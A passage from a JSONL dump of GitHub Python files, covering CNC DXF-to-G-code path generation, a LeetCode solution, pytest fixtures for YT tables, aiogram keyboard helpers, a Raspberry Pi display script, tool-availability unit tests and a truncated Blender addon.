[(graph.node[n]['coord'][0], n) for n in graph]\n elif self.param['startCond'] in ('minY', 'maxY'):\n coordAndNodeList = [(graph.node[n]['coord'][1], n) for n in graph]\n else:\n raise ValueError('unknown startCond {0}'.format(self.param['startCond']))\n coordAndNodeList.sort()\n if 'min' in self.param['startCond']:\n startNode = coordAndNodeList[0][1]\n else:\n startNode = coordAndNodeList[-1][1]\n endNode = list(graph.neighbors(startNode))[0]\n\n # Get path around graph\n simplePathList = [p for p in networkx.all_simple_paths(graph,startNode,endNode)]\n lenAndSimplePathList = [(len(p),p) for p in simplePathList]\n closedPath = max(lenAndSimplePathList)[1]\n closedPath.append(startNode)\n closedPathCoord = [graph.node[n]['coord'] for n in closedPath]\n\n\n ## ==============================================\n ## DEBUG\n ## ==============================================\n #xvals = [x for x,y in closedPathCoord]\n #yvals = [y for x,y in closedPathCoord]\n #plt.plot(xvals,yvals)\n #plt.show()\n ## ==============================================\n\n lineString = polygon.LineString(closedPathCoord)\n # Test for self intersections and if none orient closed loop for cutting direction\n if not lineString.is_simple:\n if self.param['cutterComp'] is not None:\n raise 
RuntimeError('cutterComp is not allowed for non-simple closed loops')\n cutterComp = None\n else:\n linearRing = polygon.LinearRing(closedPathCoord)\n cwTest = self.param['direction'] == 'cw' and linearRing.is_ccw\n ccwTest = self.param['direction'] == 'ccw' and not linearRing.is_ccw\n if cwTest or ccwTest:\n closedPath.reverse()\n closedPathCoord.reverse()\n\n cutterComp = self.param['cutterComp']\n if cutterComp in ('inside', 'outside'):\n cutterCompTable = {\n ('inside', 'ccw') : 'left',\n ('inside', 'cw') : 'right',\n ('outside', 'ccw') : 'right',\n ('outside', 'cw') : 'left',\n }\n cutterComp = cutterCompTable[(cutterComp,self.param['direction'])]\n\n # Get list of segments (line or arc) along path and create cnc commands\n segList = self.getSegListFromPath(closedPath,graph)\n param = dict(self.param)\n param['closed'] = True \n param['cutterComp'] = cutterComp\n listOfCmds = self.makeListOfCmdsFromSegList(segList,param)\n return listOfCmds\n\n def makeListOfCmdsFromSegList(self,segList,param):\n listOfCmds = []\n if self.param['convertArcs']:\n pointList = [p[0] for p in segList]\n pointList.append(segList[-1][1])\n param['pointList'] = pointList \n boundary = cnc_boundary.LineSegBoundaryXY(param)\n listOfCmds = boundary.listOfCmds\n else:\n raise RuntimeError('convertArcs=False not supported yet')\n\n #xList = [p[0] for p in pointList]\n #yList = [p[1] for p in pointList]\n #plt.plot(xList[:78],yList[:78],'.')\n #plt.axis('equal')\n #plt.show()\n\n return listOfCmds\n\n def getSegListFromPath(self, nodePath, graph):\n segList = []\n for node0, node1 in zip(nodePath[:-1],nodePath[1:]):\n startCoord = graph.node[node0]['coord']\n endCoord = graph.node[node1]['coord']\n edgeEntity = graph[node0][node1]['entity']\n if edgeEntity.dxftype == 'LINE':\n segList.append((startCoord, endCoord))\n else: \n if self.param['convertArcs']:\n arcSegList = self.convertDxfArcToLineList(edgeEntity)\n if dist2D(arcSegList[0][0],startCoord) > self.param['ptEquivTol']:\n arcSegList = [(y,x) for x,y in arcSegList[::-1]]\n segList.extend(arcSegList)\n else:\n raise RuntimeError('convertArcs=False not supported yet')\n return segList\n\n\n def getEntityLineList(self):\n lineList = []\n for entity in self.entityList:\n if entity.dxftype == 'LINE':\n line = entity.start[:2], entity.end[:2]\n lineList.append(line)\n else:\n arcLineList = self.convertDxfArcToLineList(entity)\n lineList.extend(arcLineList)\n return lineList\n \n\n def convertDxfArcToLineList(self,arc):\n xc = arc.center[0]\n yc = arc.center[1]\n r = arc.radius\n try:\n angStart = (math.pi/180.0)*arc.start_angle\n except AttributeError:\n angStart = (math.pi/180.0)*arc.startangle\n\n try:\n angEnd = (math.pi/180.0)*arc.end_angle\n except AttributeError:\n angEnd = (math.pi/180.0)*arc.endangle\n \n # Get array of steps from start to end angle\n if angEnd < angStart:\n angEnd += 2.0*math.pi \n totalAng = abs(angEnd - angStart)\n maxStepAng = self.param['maxArcLen']/arc.radius\n numPts = int(math.ceil(totalAng/maxStepAng))\n angStepArray = numpy.linspace(angStart, angEnd, numPts)\n # Create line segments\n lineList = []\n for ang0, ang1 in zip(angStepArray[:-1], angStepArray[1:]):\n x0 = xc + r*math.cos(ang0)\n y0 = yc + r*math.sin(ang0)\n x1 = xc + r*math.cos(ang1)\n y1 = yc + r*math.sin(ang1)\n lineSeg = ((x0,y0), (x1,y1))\n lineList.append(lineSeg)\n return lineList\n\n\n\n## Utility functions\n## -----------------------------------------------------------------------------\n#def getEntityGraph(entityList, ptEquivTol=1.0e-6):\n# ptToNodeDict = 
getPtToNodeDict(entityList,ptEquivTol)\n# graph = networkx.Graph()\n# for entity in entityList:\n# startPt, endPt = getEntityStartAndEndPts(entity)\n# startNode = ptToNodeDict[startPt]\n# graph.add_node(startNode,coord=startPt)\n# endNode = ptToNodeDict[endPt]\n# graph.add_node(endNode,coord=endPt)\n# graph.add_edge(startNode, endNode, entity=entity)\n# for edge in graph.edges():\n# # Remove any trivial edges - perhaps due to drawing errors?\n# if edge[0] == edge[1]:\n# graph.remove_edge(*edge)\n# return graph, ptToNodeDict\n#\n#def getPtToNodeDict(entityList, ptEquivTol=1.0e-6):\n# ptList = []\n# for entity in entityList:\n# startPt, endPt = getEntityStartAndEndPts(entity)\n# ptList.extend([startPt, endPt])\n# ptToNodeDict = {}\n# nodeCnt = 0\n# for i, p in enumerate(ptList):\n# found = False\n# for q in ptList[:i]:\n# if dist2D(p,q) < ptEquivTol:\n# found = True\n# ptToNodeDict[p] = ptToNodeDict[q] \n# break\n# if not found:\n# ptToNodeDict[p] = nodeCnt\n# nodeCnt += 1\n# return ptToNodeDict\n\n#def getDxfArcStartAndEndPts(arc): \n# xc = arc.center[0]\n# yc = arc.center[1]\n# r = arc.radius\n# angStart = (math.pi/180.0)*arc.startangle\n# angEnd = (math.pi/180.0)*arc.endangle\n# if angEnd < angStart:\n# angEnd += 2.0*math.pi \n# x0 = xc + r*math.cos(angStart)\n# y0 = yc + r*math.sin(angStart)\n# x1 = xc + r*math.cos(angEnd)\n# y1 = yc + r*math.sin(angEnd)\n# startPt = x0,y0\n# endPt = x1,y1\n# return startPt,endPt\n#\n#\n#def getEntityStartAndEndPts(entity):\n# if entity.dxftype == 'LINE':\n# startPt, endPt = entity.start[:2], entity.end[:2]\n# elif entity.dxftype == 'ARC':\n# startPt, endPt = getDxfArcStartAndEndPts(entity)\n# else:\n# raise RuntimeError('entity type not yet supported')\n# return startPt, endPt\n\n\n\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n\n import os\n\n prog = gcode_cmd.GCodeProg()\n prog.add(gcode_cmd.GenericStart())\n prog.add(gcode_cmd.Space())\n prog.add(gcode_cmd.FeedRate(120.0))\n\n dxfDir = os.path.join(os.curdir,'test_dxf')\n\n if 0:\n fileName = os.path.join(dxfDir,'drill_test.dxf')\n param = { \n 'fileName' : fileName,\n 'startZ' : 0.02,\n 'stopZ' : -0.5,\n 'safeZ' : 0.5,\n 'stepZ' : 0.05,\n 'startDwell' : 2.0,\n }\n drill = DxfDrill(param)\n prog.add(drill)\n\n\n if 0:\n fileName = os.path.join(dxfDir,'drill_test.dxf')\n param = { \n 'fileName' : fileName,\n 'layers' : ['layer1'],\n 'dxfTypes' : ['CIRCLE'],\n 'startZ' : 0.02,\n 'stopZ' : -0.5,\n 'safeZ' : 0.5,\n 'stepZ' : 0.05,\n 'startDwell' : 2.0,\n }\n drill = DxfDrill(param)\n prog.add(drill)\n\n if 1:\n #fileName = os.path.join(dxfDir, 'circ_boundary_test0.dxf')\n fileName = os.path.join(dxfDir, 'circ_boundary_test1.dxf')\n param = {\n 'fileName' : fileName,\n 'layers' : ['layer1', 'layer2'],\n 'depth' : 0.2,\n 'startZ' : 0.0,\n 'safeZ' : 0.15,\n 'toolDiam' : 0.25,\n 'cutterComp' : 'inside',\n 'direction' : 'ccw',\n 'maxCutDepth' : 0.03,\n 'startDwell' : 2.0,\n }\n boundary = DxfCircBoundary(param)\n prog.add(boundary)\n\n if 0:\n fileName = os.path.join(dxfDir,'circ_pocket_test.dxf')\n param = {\n 'fileName' : fileName,\n 'depth' : 0.4,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.1,\n 'overlapFinish' : 0.1,\n 'maxCutDepth' : 0.2,\n 'toolDiam' : 0.25,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfCircPocket(param)\n prog.add(pocket)\n\n\n if 0:\n fileName = os.path.join(dxfDir,'rect_extent_test0.dxf')\n param = {\n 'fileName' : fileName,\n 'components' : False,\n 'depth' : 2*0.04,\n 'startZ' : 0.0,\n 'safeZ' 
: 0.5,\n 'overlap' : 0.3,\n 'overlapFinish' : 0.5,\n 'maxCutDepth' : 0.04,\n 'toolDiam' : 0.25,\n 'cornerCut' : False,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfRectPocketFromExtent(param)\n prog.add(pocket)\n\n\n if 0:\n fileName = os.path.join(dxfDir,'rect_extent_test1.dxf')\n param = {\n 'fileName' : fileName,\n 'components' : True,\n 'depth' : 2*0.04,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.3,\n 'overlapFinish' : 0.5,\n 'maxCutDepth' : 0.04,\n 'toolDiam' : 0.25,\n 'cornerCut' : False,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfRectPocketFromExtent(param)\n prog.add(pocket)\n\n if 0:\n fileName = os.path.join(dxfDir,'circ_pocket_test.dxf')\n param = {\n 'fileName' : fileName,\n 'layers' : ['layer1'],\n 'depth' : 0.4,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.1,\n 'overlapFinish' : 0.1,\n 'maxCutDepth' : 0.2,\n 'toolDiam' : 0.25,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfCircPocket(param)\n prog.add(pocket)\n\n\n\n if 0:\n #fileName = os.path.join(dxfDir,'boundary_test0.dxf')\n fileName = os.path.join(dxfDir,'boundary_test1.dxf')\n #fileName = os.path.join(dxfDir,'boundary_test2.dxf')\n #fileName = os.path.join(dxfDir,'boundary_test3.dxf')\n #fileName = os.path.join(dxfDir,'boundary_test4.dxf')\n param = {\n 'fileName' : fileName,\n 'depth' : 0.03,\n 'startZ' : 0.0,\n 'safeZ' : 0.2,\n 'toolDiam' : 0.25,\n 'direction' : 'ccw',\n 'cutterComp' : None,\n 'maxCutDepth' : 0.03,\n 'startDwell' : 2.0,\n 'startCond' : 'minX',\n }\n boundary = DxfBoundary(param)\n prog.add(boundary)\n\n prog.add(gcode_cmd.Space())\n prog.add(gcode_cmd.End(),comment=True)\n print(prog)\n prog.write('test.ngc')\n","repo_name":"iorodeo/py2gcode","sub_path":"py2gcode/cnc_dxf.py","file_name":"cnc_dxf.py","file_ext":"py","file_size_in_byte":25728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71646707434","text":"\"\"\"\nGiven an array arr, replace every element in that array with the greatest element among \nthe elements to its right, and replace the last element with -1.\n\nAfter doing so, return the array.\n\nEXPLANATION:\n\nBrute force doesnt pass. 
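It is O(n^2), since it rescans the suffix for a max at every index.\nWorked example (hand-checked): [17,18,5,4,6,1] -> [18,6,6,6,1,-1].\n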
Need to realize that we start at the end and keep track of our biggest number yet\nwhen we find a number bigger than it we replace it with our previous max and then start using the new max.\n\"\"\"\n\n\ndef replaceElements(arr: list[int]) -> list[int]:\n\n _max = -1\n n = len(arr)\n\n for i in range(n - 1, -1, -1):\n tmp = arr[i]\n arr[i] = _max\n \n if tmp > _max:\n _max = tmp\n\n return arr","repo_name":"kennyhml/leetcode","sub_path":"easy/1299_replace_elements.py","file_name":"1299_replace_elements.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"87932539","text":"import pytest\n\nfrom yt import yson\nimport yt.wrapper as yt\n\nfrom yql_utils import yql_binary_path\n\nfrom crypta.graph.soup.config.python import EDGE_TYPE\nfrom crypta.graph.soupy_indevice.lib import config\n\nfrom crypta.graph.v1.python.v2.soup.soup_storage_yql_schema import SCHEMA\n\n\ndef create_table(ytc, path, schemadict):\n schemalist = []\n for typ, fields in schemadict.iteritems():\n for f in fields:\n schemalist.append({\"name\": f, \"type\": typ})\n\n schema = yson.YsonList(schemalist)\n schema.attributes[\"strict\"] = True\n ytc.create_table(path, attributes=dict(schema=schema), ignore_existing=True, recursive=True)\n\n\n@pytest.fixture(scope=\"module\")\ndef indevice_soup(request, yt_stuff):\n ytc = yt_stuff.get_yt_client()\n edge_types = [et for et in EDGE_TYPE.values() if et.Props.DeviceBounds == et.Props.INDEVICE]\n\n soup_dir = \"//soup/\"\n ytc.mkdir(soup_dir[:-1])\n\n schema = {\"string\": [\"id1\", \"id1Type\", \"id2\", \"id2Type\", \"sourceType\", \"logSource\"], \"any\": [\"dates\"]}\n for et in edge_types:\n tbl = soup_dir + EDGE_TYPE.name(et)\n create_table(ytc, tbl, schema)\n yt.set_attribute(tbl, \"_yql_row_spec\", SCHEMA)\n\n data = [\n (\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"mm_device_id\",\n \"baadbaad-baad-baad-baad-baadbaadbaad\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10666661500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-12\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10777771500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10888881500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"gaid\",\n \"abad1dea-abad-1dea-abad-1deaabad1dea\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"mm_device_id\",\n \"baadbaad-baad-baad-baad-baadbaadbaad\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10666661500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-12\",\n 
\"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10777771500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10888881500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"oaid\",\n \"abad1dea-abad-1dea-abad-1deaabad1dea\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"idfa\",\n \"F00FF00F-F00F-F00F-F00F-F00FF00FF00F\",\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10111111500000000\",\n \"idfa\",\n \"F00FF00F-F00F-F00F-F00F-F00FF00FF00F\",\n \"app-metrica-socket-ios\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10222221500000000\",\n \"idfa\",\n \"F00FF00F-F00F-F00F-F00F-F00FF00FF00F\",\n \"app-metrica-socket-ios\",\n \"wl\",\n \"2018-12-06\",\n \"2018-12-12\",\n ),\n (\n \"gaid\",\n \"aaaaaaaa-aaaa-aaaa-aaaa-111111111111\",\n \"mm_device_id\",\n \"bbbbbbbb-bbbb-bbbb-bbbb-222222222222\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"gaid\",\n \"aaaaaaaa-aaaa-aaaa-aaaa-111111111111\",\n \"mm_device_id\",\n \"cccccccc-cccc-cccc-cccc-333333333333\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"gaid\",\n \"aaaaaaaa-aaaa-aaaa-aaaa-111111111111\",\n \"mm_device_id\",\n \"dddddddd-dddd-dddd-dddd-444444444444\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10777771500000000\",\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"access-yp-did\",\n \"access\",\n \"2018-12-02\",\n \"2018-12-02\",\n ),\n (\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"uuid\",\n \"123456789012345678901234567890ab\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"uuid\",\n \"cd123456789012345678901234567890\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"uuid\",\n \"1234567890de12345678901234567890\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n ]\n\n for d in data:\n tbl_name = soup_dir + \"{}_{}_{}_{}\".format(d[0], d[2], d[4], d[5])\n yt.write_table(\n yt.TablePath(tbl_name, append=True),\n [\n {\n \"id1Type\": d[0],\n \"id1\": d[1],\n \"id2Type\": d[2],\n \"id2\": d[3],\n \"sourceType\": d[4],\n \"logSource\": d[5],\n \"dates\": [d[6], d[7]],\n }\n ],\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef idstorage(request, yt_stuff):\n ytc = yt_stuff.get_yt_client()\n\n browser_schema = {\n \"string\": [\n \"id_type\",\n \"id\",\n \"os_family\",\n \"os_version\",\n \"browser_name\",\n \"os_name\",\n \"browser_version\",\n \"date_begin\",\n \"date_end\",\n ],\n \"boolean\": [\"is_emulator\", \"is_touch\", \"is_browser\", \"is_robot\", \"is_tv\", \"is_tablet\", \"is_mobile\"],\n }\n\n device_schema = {\n \"string\": [\"id_type\", \"id\", \"date_begin\", \"date_end\", \"os_version\", \"os\", \"manufacturer\", \"model\"],\n \"int64\": [\"screen_height\", \"screen_width\"],\n }\n\n app_schema = {\n \"string\": [\"id_type\", \"id\", \"date_begin\", \"date_end\", \"os\", \"app_version\", \"app_id\"],\n 
\"any\": [\"api_keys\"],\n }\n\n idstorage_dir = \"//idstorage/\"\n\n for idt in [\"yandexuid\", \"icookie\"]:\n table = \"{}{}/eternal\".format(idstorage_dir, idt)\n create_table(ytc, table, browser_schema)\n\n browsers = [\n (\"10111111500000000\", \"somebrowser\", \"7.0\", True),\n (\"10222221500000000\", \"somebrowser\", \"7.0\", True),\n (\"10555551500000000\", \"somebrowser\", \"7.0\", True),\n (\"10666661500000000\", \"somebrowser\", \"7.0\", True),\n (\"10777771500000000\", \"otherbrowser\", \"7.0\", True),\n (\"10888881500000000\", \"somebrowser\", \"7.0\", False),\n ]\n\n yt.write_table(\n table,\n [dict(id_type=idt, id=b[0], browser_name=b[1], browser_version=b[2], is_browser=b[3]) for b in browsers],\n )\n\n devices = {\n \"gaid\": [(\"abad1dea-abad-1dea-abad-1deaabad1dea\", \"ACME\", \"Emulator\")],\n \"oaid\": [(\"abad1dea-abad-1dea-abad-1deaabad1de1\", \"ACME\", \"Emulator\")],\n \"idfa\": [],\n \"mm_device_id\": [\n (\"bbbbbbbb-bbbb-bbbb-bbbb-222222222222\", \"ACME\", \"PhoneOne\"),\n (\"cccccccc-cccc-cccc-cccc-333333333333\", \"ACME\", \"PhoneTwo\"),\n (\"dddddddd-dddd-dddd-dddd-444444444444\", \"ACME\", \"PhoneThree\"),\n ],\n }\n\n apps = {\n (\"123456789012345678901234567890ab\", \"android\", \"com.acme.app1\", \"1.1\"),\n (\"cd123456789012345678901234567890\", \"android\", \"com.acme.app1\", \"1.1\"),\n (\"1234567890de12345678901234567890\", \"android\", \"com.acme.app1\", \"2.2\"),\n }\n\n for idt in [\"idfa\", \"gaid\", \"oaid\", \"mm_device_id\"]:\n table = \"{}{}/eternal\".format(idstorage_dir, idt)\n create_table(ytc, table, device_schema)\n yt.write_table(table, [dict(id_type=idt, id=d[0], manufacturer=d[1], model=d[2]) for d in devices[idt]])\n\n uuid_tbl = \"{}uuid/eternal\".format(idstorage_dir)\n create_table(ytc, uuid_tbl, app_schema)\n yt.write_table(uuid_tbl, [dict(id_type=\"uuid\", id=a[0], os=a[1], app_id=a[2], app_version=a[3]) for a in apps])\n\n\n@pytest.fixture(scope=\"module\")\ndef indevice_conf(request, yt_stuff):\n config.YT_PROXY = yt_stuff.get_server()\n config.MRJOB_PATH = yql_binary_path(\"yql/tools/mrjob/mrjob\")\n config.UDF_RESOLVER_PATH = yql_binary_path(\"yql/tools/udf_resolver/udf_resolver\")\n config.UDFS_DIR = \";\".join([yql_binary_path(\"yql/udfs\"), yql_binary_path(\"ydb/library/yql/udfs\")])\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/tests/conftest (5).py","file_name":"conftest (5).py","file_ext":"py","file_size_in_byte":10723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30256287919","text":"from typing import Any, Sequence, Type\n\nfrom aiogram.filters.callback_data import CallbackData\nfrom aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom .callback_data import PaginationCallbackData\n\n\ndef inline_keyboard_pagination(\n elements: Sequence[InlineKeyboardButton],\n page: int,\n page_count: int,\n callback_type: Type[PaginationCallbackData],\n callback_extra_args: dict[str, Any] | None = None,\n columns: int = 1,\n back_callback: CallbackData | None = None,\n add_callback: CallbackData | None = None,\n) -> InlineKeyboardMarkup:\n callback_extra_args = callback_extra_args or {}\n keyboard = [list(elements[i:i + columns]) for i in range(0, len(elements), columns)]\n if add_callback is not None:\n keyboard.insert(0, [InlineKeyboardButton(text=\"Добавить\", callback_data=add_callback.pack())])\n pagination_row = [InlineKeyboardButton(\n text=str(page),\n callback_data=callback_type(**callback_extra_args, 
page=page).pack(),\n )]\n if page > 1:\n pagination_row.insert(\n 0,\n InlineKeyboardButton(\n text=f\"< {page - 1}\",\n callback_data=callback_type(**callback_extra_args, page=page - 1).pack(),\n ),\n )\n if page < page_count:\n pagination_row.append(\n InlineKeyboardButton(\n text=f\"{page + 1} >\",\n callback_data=callback_type(**callback_extra_args, page=page + 1).pack(),\n ),\n )\n if len(pagination_row) > 1:\n keyboard.append(pagination_row)\n if back_callback is not None:\n keyboard.append([InlineKeyboardButton(text=\"Назад\", callback_data=back_callback.pack())])\n\n return InlineKeyboardMarkup(inline_keyboard=keyboard)\n\n\ndef generate_full_name(first_name: str | None, last_name: str | None) -> str:\n first_name = first_name or \"\"\n last_name = last_name or \"\"\n return f\"{first_name} {last_name}\".strip()\n","repo_name":"OlegYurchik/dresscode_bot","sub_path":"dresscode_bot/services/telegram/handlers/dialog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9772938686","text":"import RPi.GPIO as GPIO\n\nimport time\nfrom math import sqrt; from itertools import count, islice\n\nfrom output_pin import OutputPin\nfrom input_pin import InputPin\n\nprint('Initializing...')\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n\"\"\" The ports for the SSD, in order of pin connection on the board.\n There is one port per segment, and one for the dot, for a total of 8.\n\"\"\"\nports = [26, 19, 6, 5, 21, 20, 12, 25]\n\n\"\"\" These ports seem to cause the SSD to just go dark when the pins are high,\n no matter what the other pins are. We just make sure they get set to low\n on init and don't get touched after that.\n\"\"\"\nbad_ports = [13, 16]\n\nzero = [0, 1, 1, 1, 1, 1, 1, 0]\none = [0, 0, 0, 1, 0, 0, 1, 0]\ntwo = [1, 0, 1, 1, 1, 1, 0, 0]\nthree = [1, 0, 1, 1, 0, 1, 1, 0]\nfour = [1, 1, 0, 1, 0, 0, 1, 0]\nfive = [1, 1, 1, 0, 0, 1, 1, 0]\nsix = [1, 1, 1, 0, 1, 1, 1, 0]\nseven = [0, 0, 1, 1, 0, 0, 1, 0]\neight = [1, 1, 1, 1, 1, 1, 1, 0]\nnine = [1, 1, 1, 1, 0, 1, 1, 0]\ndigits = [zero, one, two, three, four, five, six, seven, eight, nine]\n\nbutton = InputPin(17)\nled = OutputPin(4, False)\n\nfor port in ports:\n GPIO.setup(port, GPIO.OUT)\nfor bad_port in bad_ports:\n GPIO.setup(bad_port, GPIO.OUT)\n GPIO.output(bad_port, GPIO.LOW)\n\ndef print_num(number_array):\n for idx in range(len(ports)):\n bins = [True if int(i) else False for i in number_array]\n GPIO.output(ports[idx], GPIO.HIGH if bins[idx] else GPIO.LOW)\n\ndef is_prime(n):\n return n > 1 and all(n%i for i in islice(count(2), int(sqrt(n)-1)))\n\n\ncounter = 0\nprint_num(zero)\nwhile True:\n button.wait_for_edge(GPIO.FALLING, bouncetime=300)\n print_num(digits[counter])\n led.set_status(is_prime(counter))\n counter = (counter + 1) % 10\n \n \n \n \n","repo_name":"awjc/RpiPlayground","sub_path":"seven_segment_display.py","file_name":"seven_segment_display.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7269385277","text":"import unittest\nimport os\nimport subprocess\n\nclass TestCallExternalApplications(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n print(\"!?\")\n\n def test_call_samtools_from_path(self):\n call = subprocess.Popen(\"samtools\", stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell=True)\n msg = call.communicate()\n self.assertTrue(call.returncode == 
1, \"Failed to call `samtools` from shell\\n\\n %r\" % (msg,))\n\n def test_call_snpeff_from_environment(self):\n self.assertTrue(\"SNPEFF_PATH\" in os.environ, \"Could not find environmental variable $SNPEFF_PATH to find snpEff's install directory\")\n snpeff_path = os.environ['SNPEFF_PATH'] \n call = subprocess.Popen(\"java -Xmx2g -jar \" + snpeff_path + os.sep + \"snpEff.jar -h\", stdout = subprocess.PIPE, \n stderr = subprocess.PIPE, shell=True)\n msg = call.communicate()\n self.assertTrue(call.returncode == 255, \"Failed to call `%s` from shell using environmental variable $SNPEFF_PATH.\\n\\n %r\" % \n (\"java -Xmx2g -jar \" + snpeff_path + os.sep + \"snpEff.jar\", msg))\n\n def test_call_blastp_from_path(self):\n call = subprocess.Popen(\"blastp -h\", stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell=True)\n msg = call.communicate()\n self.assertTrue(call.returncode == 0, \"Failed to call `blastp` from shell.\\n\\n %r\" % (msg,))\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"PathoScope/PathoVar","sub_path":"tests/test_installed_components.py","file_name":"test_installed_components.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20945401770","text":"import ast\r\nimport contextlib\r\nimport fnmatch\r\nimport json\r\nimport os\r\nimport re\r\nimport sqlite3\r\nfrom pathlib import Path\r\n\r\n# from icecream import ic\r\nimport bpy\r\nimport pandas as pd\r\nfrom database.aqua_database import conexao_banco_local\r\nfrom addons.install_modules import CaixaMensagemPM\r\nfrom bpy_plus.file_system import Path\r\nfrom classes.aqua_classes import Colecoes\r\n\r\nfrom database.aqua_obj_props import select_codpro\r\n\r\nfrom funcoes.aqua_funcoes import caminhos_pastas, painel_aviso, conexao_banco\r\nfrom funcoes.aqua_database import conexao_banco_local\r\n\r\npm_produtos = conexao_banco_local()[0]\r\n\r\n\r\ndef lista_derivacoes_items(self, context):\r\n lista_derivacoes_items = []\r\n\r\n for produto in tuple(select_codpro()):\r\n print(produto)\r\n\r\n lista_derivacoes_items.append((produto[1], produto[1], produto[1]))\r\n\r\n return lista_derivacoes_items\r\n\r\n\r\ndef preencher_dados(self, context):\r\n bpy.context.scene.propriedades_derivacao.clear()\r\n for produto in tuple(select_codpro()):\r\n bpy.context.scene.propriedades_derivacao.add().derivacao = str(produto[1])\r\n bpy.context.object.aqua.nome = str(produto[0])\r\n bpy.context.object.aqua.peso = float(produto[4])\r\n\r\n bpy.context.scene.propriedades_derivacao_selecionada.clear()\r\n for der in 